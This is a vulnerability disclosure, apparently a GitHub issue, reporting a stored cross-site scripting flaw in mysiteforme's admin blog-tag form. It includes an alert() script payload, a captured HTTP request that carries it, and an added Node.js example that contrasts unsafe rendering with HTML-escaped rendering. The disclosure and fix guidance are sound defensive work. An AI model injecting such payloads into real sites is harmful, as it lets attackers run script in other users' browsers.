Cross Site Scripting (XSS) vulnerability exists in mysiteforme
In the background blog management, open the "add blog tag" function under blog tags and enter the payload
`<script>alert("XSS")</script>` as the tag name. After the tag is added successfully, an XSS alert window pops up on the page.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/wangl1989/mysiteforme
[Affected Component]
```http
POST /admin/blogTags/add HTTP/1.1
Host: localhost:8081
Content-Length: 65
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8081/admin/blogTags/add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=97051b6c-9fd6-4b2b-a376-282138ee5c91; rememberMe=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
Connection: close

name=%E6%A0%87%E7%AD%BE%3Cscript%3Ealer(%22xss%22)%3C%2Fscript%3E
```
[Attack Type]
Remote
[Impact]
Code execution
![image](https://user-images.githubusercontent.com/51281362/147540920-a89239aa-ca63-4eac-bca0-ddd5790fd794.png)
![image](https://user-images.githubusercontent.com/51281362/147540942-e4b002c5-da9b-4edc-910e-3097a49e8dbd.png)
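The following is an added example, not code from the mysiteforme project or from the reporter. It decodes the exact form body captured in the request above (the body stores the tag name as `标签<script>aler("xss")</script>`, with `alert` spelled as it appears in the capture) and contrasts the stored-XSS pattern the report describes, a tag name concatenated straight into the tag-list markup, with output encoding on render. The string-concatenation rendering is an assumed stand-in for whatever template the project actually uses; the page does not show that code. Runs under Node.js with no dependencies.

```javascript
// Added example (not mysiteforme code): decode the captured form body and
// contrast unsafe vs. HTML-escaped rendering of a stored blog-tag name.

// Body of the captured POST /admin/blogTags/add request, copied from the report.
const CAPTURED_BODY =
  "name=%E6%A0%87%E7%AD%BE%3Cscript%3Ealer(%22xss%22)%3C%2Fscript%3E";

// Parse an application/x-www-form-urlencoded body the way the server would
// (percent-decoding, '+' as space).
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Minimal HTML entity encoding, safe for text nodes and double-quoted attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Assumed vulnerable pattern: the stored tag name is interpolated straight into
// markup, so a name containing <script> is executed when the tag list renders.
function renderTagRowUnsafe(tag) {
  return `<tr><td>${tag.name}</td></tr>`;
}

// Hardened pattern: encode on output; the same name renders as literal text.
function renderTagRowSafe(tag) {
  return `<tr><td>${escapeHtml(tag.name)}</td></tr>`;
}

// Check a reviewer can run over rendered output: does a raw <script tag survive?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Walk the captured request through both renderers and report what survives.
function demo(body = CAPTURED_BODY) {
  const tag = parseFormBody(body);
  const unsafe = renderTagRowUnsafe(tag);
  const safe = renderTagRowSafe(tag);
  return {
    name: tag.name,
    unsafe,
    safe,
    unsafeExecutable: containsScriptTag(unsafe),
    safeExecutable: containsScriptTag(safe),
  };
}

console.log(demo());
```

The escaping must happen where the value is written into HTML, not where it is accepted: stripping `<script>` on input misses other vectors (event-handler attributes, `<img onerror>`), whereas entity-encoding every stored field at render time neutralises all of them in a text context.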